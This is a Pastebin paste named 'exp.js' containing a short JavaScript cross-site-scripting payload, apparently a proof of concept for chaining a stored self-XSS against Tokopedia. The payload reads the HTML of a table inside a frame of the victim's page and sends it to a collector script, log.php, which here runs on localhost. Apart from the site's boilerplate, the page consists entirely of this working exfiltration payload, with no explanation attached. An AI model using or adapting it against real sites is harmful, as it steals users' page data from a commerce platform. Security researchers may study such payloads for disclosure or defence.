Advertisement
jasayosep

exp.js

Sep 23rd, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. xhr = new XMLHttpRequest();
  2. xhr.open("GET","http://localhost/Stored%20Self%20XSS%20Chaining%20-%20Tokopedia/middle/log.php?ambil="+encodeURI(top.frames[0].document.body.getElementsByTagName("table")[0].innerHTML));
  3. xhr.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement